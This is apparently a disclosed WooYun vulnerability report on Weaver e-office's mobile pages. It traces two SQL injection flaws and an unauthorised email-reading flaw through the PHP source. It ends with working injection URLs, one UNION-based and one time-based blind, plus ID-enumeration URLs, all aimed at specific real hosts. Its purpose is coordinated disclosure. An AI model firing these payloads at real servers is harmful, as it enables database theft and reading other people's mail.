乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-22: 细节已通知厂商并且等待厂商处理中 2015-07-24: 厂商已经确认,细节仅向厂商公开 2015-07-27: 细节向第三方安全合作伙伴开放 2015-09-17: 细节向核心白帽子及相关领域专家公开 2015-09-27: 细节向普通白帽子公开 2015-10-07: 细节向实习白帽子公开 2015-10-22: 细节向公众公开
rt
看到E-mobile/calendar_page.php
$mobilekey = $_REQUEST['mobilesessionkey'];$page = $_REQUEST['page'];$module = $_REQUEST['module'];$scope = $_REQUEST['scope'];$detailid = $_REQUEST['detailid'];$fromid = $_REQUEST['fromid'];$sessionstr = $_REQUEST['sessionkey'];$strexplode = explode( ",", $sessionstr );$userid = $strexplode[1];$calid = $detailid;$UserInfor = array( );$UserInfor['user_id'] = $userid;$caleApi = new calendar( $UserInfor );$cales = $caleApi->getCalendarInfo( "", "", "", $calid );
跟进getCalendarInfo函数
public function getCalendarInfo( $limit = 0, $start = 0, $date = "", $calid = "", $keyword = "", $order = "" ) { global $connection; $limit = 0 < $limit ? $limit : $this->default_limit; $start = 0 < $start ? $start : $this->default_start; $sql = "\r\n\t\t\t\tSELECT * FROM calendar \r\n\t\t\t\t WHERE 1 \r\n\t\t\t\t AND (\r\n\t\t\t\t USER_ID='".$this->userid."' \r\n\t\t\t\t OR \r\n\t\t\t\t SHARE_USER LIKE '%,".$this->userid.",%' \r\n\t\t\t\t OR \r\n\t\t\t\t LEFT(SHARE_USER,".strlen( $this->userid ).") = '".$this->userid."'\r\n\t\t\t\t)"; if ( $calid != "" ) { $sql .= " AND CAL_ID=".$calid." "; //注入 } if ( $date != "" ) { $sql .= " AND TO_DAYS(CAL_BEGIN)=TO_DAYS('".$date."')"; } if ( $keyword != "" ) { $sql .= " AND CAL_CONTENT like '%".$keyword."%'"; } if ( $order == "" ) { $sql .= "ORDER BY CAL_BEGIN DESC LIMIT ".$start.",".$limit.""; } else { $sql .= "ORDER BY ".$order." DESC LIMIT ".$start.",".$limit.""; } $rs = exequery( $connection, $sql ); $resultArray = array( ); while ( $row = mysql_fetch_array( $rs ) ) { $calData['USER_ID'] = $row['USER_ID']; $calData['CAL_ID'] = $row['CAL_ID']; $calData['USER_NAME'] = getusernamenew( $row['USER_ID'] ); $calData['CAL_CONTENT'] = $row['CAL_CONTENT']; $calData['CAL_LEVEL'] = $row['CAL_LEVEL']; $calData['CAL_TYPE'] = $row['CAL_TYPE']; $calData['CAL_BEGIN'] = $row['CAL_BEGIN']; $calData['CAL_END'] = $row['CAL_END']; $calData['CAL_WHILE_TYPE'] = $row['CAL_WHILE_TYPE']; $calData['CAL_EACH_WHEEL'] = $row['CAL_EACH_WHEEL']; $calData['CAL_STR_WEEK'] = $row['CAL_STR_WEEK']; array_push( $resultArray, $calData ); } return $resultArray; }
注入#2E-mobile/diarymy_page.php
include_once( "inc/utility_all.php" );include_once( "inc/conn.php" );include_once( "api/diary.class.php" );include_once( "E-mobile/func_all.php" );$user_id = $_REQUEST['userid'];$start = $_REQUEST['start'] ? $_REQUEST['start'] : 0;$Diary = new diary( );$SearchStr['start'] = $start;$SearchStr['limit'] = 10;$diaryinfor = $Diary->MobileShowAllDiary( $user_id, $SearchStr );$diaryallcount = $Diary->GetMobileAllDiaryCount( $user_id, $SearchStr );$diarycount = count( $diaryinfor );
跟进MobileShowAllDiary
public function MobileShowAllDiary( $userid, $SearchStr = "" ) { global $connection; $info = array( ); if ( $SearchStr['under'] != "" ) { $user_str = substr( $SearchStr['userstr'], 0, -1 ); if ( $userid == "admin" ) { $query = "SELECT * FROM diary WHERE USER_ID!='admin' AND USER_ID IN (".$user_str.")"; } else { $query = "SELECT * FROM diary WHERE USER_ID IN (".$user_str.")"; } } else { $query = "SELECT * FROM diary WHERE USER_ID='".$userid."'"; } if ( $SearchStr['content'] != "" ) { $query .= " AND CONTENT LIKE '%".$value."%'"; } if ( $SearchStr['diff'] == "PuisneDiary" ) { $query .= " AND DIA_TYPE='1'"; } $query .= " ORDER BY DIA_DATE DESC"; if ( $SearchStr['start'] !== "" ) { $query .= " LIMIT ".$SearchStr['start'].","; //注入 } if ( $SearchStr['limit'] != "" ) { $query .= $SearchStr['limit']; } $cursor = exequery( $connection, $query ); $I = 0; while ( $ROW = mysql_fetch_array( $cursor ) ) { $info[$I]['diary_id'] = $ROW['DIA_ID']; $info[$I]['person_id'] = $ROW['USER_ID']; $info[$I]['diary_date'] = $ROW['DIA_DATE']; $info[$I]['diary_type'] = $ROW['DIA_TYPE']; $info[$I]['diary_content'] = $ROW['CONTENT']; $info[$I]['diary_creatdate'] = $ROW['ADD_TIME']; $info[$I]['ATTACHMENT_ID'] = $ROW['ATTACHMENT_ID']; $info[$I]['ATTACHMENT_NAME'] = $ROW['ATTACHMENT_NAME']; $Reply = $ROW['DIA_ID']( $ROW['DIA_ID'] ); $info[$I]['Reply'] = $Reply; ++$I; } return $info; }
越权遍历邮件#3E-mobile/email_page.php
include_once( "api/email.class.php" );include_once( "inc/conn.php" );include_once( "inc/utility_all.php" );include_once( "E-mobile/func_all.php" );$mobilekey = $_REQUEST['mobilesessionkey'];$page = $_REQUEST['page'];$module = $_REQUEST['module'];$scope = $_REQUEST['scope'];$detailid = $_REQUEST['detailid'];$fromid = $_REQUEST['fromid'];$sessionstr = $_REQUEST['sessionkey'];$strexplode = explode( ",", $sessionstr );$userid = $strexplode[1];$UserInfor = array( );$UserInfor['user_id'] = $userid;$emailId = $detailid;$email = new email( $UserInfor );$emailInfor = $email->getEmailById( $emailId, "" );
然后emailId可控,跟进getEmailById
public function getEmailById( $id, $box = "" ) { global $connection; $sql = " select * from email where email_id = '{$id}' "; $cursor = exequery( $connection, $sql ); $row = mysql_fetch_array( $cursor, MYSQL_ASSOC ); $inArray = array( $row ); $inArray = $this->replaceUserStr( "TO_ID", "TO_NAME", $inArray ); $inArray = $this->replaceUserStr( "TO_ID2", "TO_NAME2", $inArray ); $inArray = $this->replaceUserStr( "FROM_ID", "FROM_NAME", $inArray ); if ( $box == "" ) { $this->updateReadflag( $id ); } return $inArray[0]; }
查询邮件内容
http://eoffice8.weaver.cn:8028/E-mobile/calendar_page.php?detailid=-5272 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,user(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
http://eoffice8.weaver.cn:8028/E-mobile/diarymy_page.php?start=1,1 procedure analyse((select IF(MID(user(),1,1)=114, sleep(5),1)),1)
http://219.232.254.131:8082//E-mobile/email_page.php?detailid=7
http://219.232.254.131:8082//E-mobile/email_page.php?detailid=1
0.0
危害等级:高
漏洞Rank:11
确认时间:2015-07-24 14:26
CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。
暂无